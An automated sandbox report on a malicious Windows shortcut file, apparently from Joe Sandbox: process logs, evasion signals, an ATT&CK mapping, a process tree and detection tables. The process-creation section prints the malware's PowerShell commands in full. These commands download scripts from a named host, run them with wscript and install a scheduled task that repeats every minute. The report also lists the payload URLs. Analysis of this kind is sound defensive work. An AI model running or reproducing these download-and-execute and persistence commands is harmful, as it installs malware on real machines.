      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4657
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5151
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4050
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4708
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3693
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5232
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1419
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep time: -9223372036854770s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: wscript.exe, 0000000B.00000002.2300523427.0000017912264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
      Source: powershell.exe, 00000000.00000002.1751935615.00000173B2093000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000004.00000002.1882266470.0000026AC68D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2447829274.000001E7F07E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara matchFile source: amsi64_7332.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -comman [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $oezdnwd8hg1rxrns6ya = new-object net.webclient; $cio = $oezdnwd8hg1rxrns6ya.downloaddata('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php'); $oezdnwd8hg1rxrns6ya.downloadfile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php', 'evqtmldasrmzuk.js'); schtasks /create /sc minute /mo 1 /f /tr ([system.text.encoding]::utf8.getstring($cio) + $env:tmp + '\' + ('evqtmldasrmzuk.js ' * 2)) /tn za3xqiywq;
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\v58w09daljek.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn evqtmldasrmzuk.js /f; wscript $env:programdata\v58w09daljek.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (the number in parentheses is the count of matching signatures for that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (21) | Valid Accounts | Command and Scripting Interpreter (1) | Scheduled Task/Job (1) | Process Injection (11) | Virtualization/Sandbox Evasion (21) | OS Credential Dumping | Security Software Discovery (11) | Remote Services | Data from Local System | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job (1) | Scripting (21) | Scheduled Task/Job (1) | Process Injection (11) | LSASS Memory | Process Discovery (11) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Exploitation for Client Execution (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Obfuscated Files or Information (1) | Security Account Manager | Virtualization/Sandbox Evasion (21) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | PowerShell (2) | Login Hook | Login Hook | DLL Side-Loading (1) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (13) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | System Information Discovery (12) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Behavior Graph ID: 1567188, Sample: G9eWTvswoH.lnk, Start date: 03/12/2024, Architecture: WINDOWS, Score: 100

Behavior graph (rendered as a process tree; numbers in parentheses are the graph's node IDs):

Start (2): G9eWTvswoH.lnk
  Domains: www.italialife24.it, italialife24.it
  Signatures: Malicious sample detected (through community Yara rule); Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for submitted file; 12 other signatures
  -> wscript.exe (8)
       Signatures: Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
       -> powershell.exe (19)
            -> wscript.exe (29): Windows Scripting host queries suspicious COM object (likely to drop second stage)
            -> conhost.exe (32)
            -> schtasks.exe (34)
  -> wscript.exe (11)
       -> powershell.exe (21)
            -> conhost.exe (36)
            -> schtasks.exe (38)
            -> wscript.exe (40)
  -> wscript.exe (13)
       -> powershell.exe (23)
            -> conhost.exe (42)
  -> powershell.exe (15)
       Network: italialife24.it 46.254.34.201, port 443, local ports 49730, 49731, SERVERPLAN-ASIT Italy
       Dropped: C:\Users\user\AppData\...\evQtmlDaSRMzUk.js, ASCII
       Signature: Uses schtasks.exe or at.exe to add and modify task schedules
       -> conhost.exe (25)
       -> schtasks.exe (27)

Source | Detection | Scanner | Label
G9eWTvswoH.lnk | 46% | ReversingLabs | Shortcut.Trojan.Pantera
G9eWTvswoH.lnk | 45% | Virustotal |
G9eWTvswoH.lnk | 100% | Joe Sandbox ML |
      No Antivirus matches
      No Antivirus matches
Source | Detection | Scanner | Label
italialife24.it | 0% | Virustotal |
www.italialife24.it | 0% | Virustotal |

Source | Detection | Scanner | Label
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php | 0% | Avira URL Cloud | safe
http://crl.microsc | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/0 | 0% | Avira URL Cloud | safe
https://www.italialife24.it | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/a | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1 | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-c | 0% | Avira URL Cloud | safe
http://italialife24.it | 0% | Avira URL Cloud | safe
http://www.italialife24.it | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
italialife24.it | 46.254.34.201 | true | true | | unknown
www.italialife24.it | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php | true | Avira URL Cloud: safe | unknown
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php | true | Avira URL Cloud: safe | unknown
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
